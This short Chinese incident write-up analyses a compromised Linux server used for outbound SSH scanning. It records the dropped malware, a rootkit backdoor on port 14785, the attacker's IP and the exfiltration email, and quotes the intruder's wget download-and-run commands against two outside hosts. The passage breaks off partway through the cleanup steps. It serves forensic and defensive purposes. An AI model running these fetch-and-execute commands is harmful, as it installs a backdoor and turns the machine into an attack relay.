分析一台被入侵的linux服务器

客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下

黑客进入服务器后所做的操作:

1.       /var/tmp/下上传了两个恶意程序



其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

2.       入侵者登陆记录


85.120.78.140
IP来自罗马尼亚。

3.       wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg

wget adelinuangell.lx.ro/ryo.tar

tar xvf ryo.tar

cd .access.log

./config Ady 14785

./run

结束进程。删掉程序。。删掉用户。修改root密码。撤